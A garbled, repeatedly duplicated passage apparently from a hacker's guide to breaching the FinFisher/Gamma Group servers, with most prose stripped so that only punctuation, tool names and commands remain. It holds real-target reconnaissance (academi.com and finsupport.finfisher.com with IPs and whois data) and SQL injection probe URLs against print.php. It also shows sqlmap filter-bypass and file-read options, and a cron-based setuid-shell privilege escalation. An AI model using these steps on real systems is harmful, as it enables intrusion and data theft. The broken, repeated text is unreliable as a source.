Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
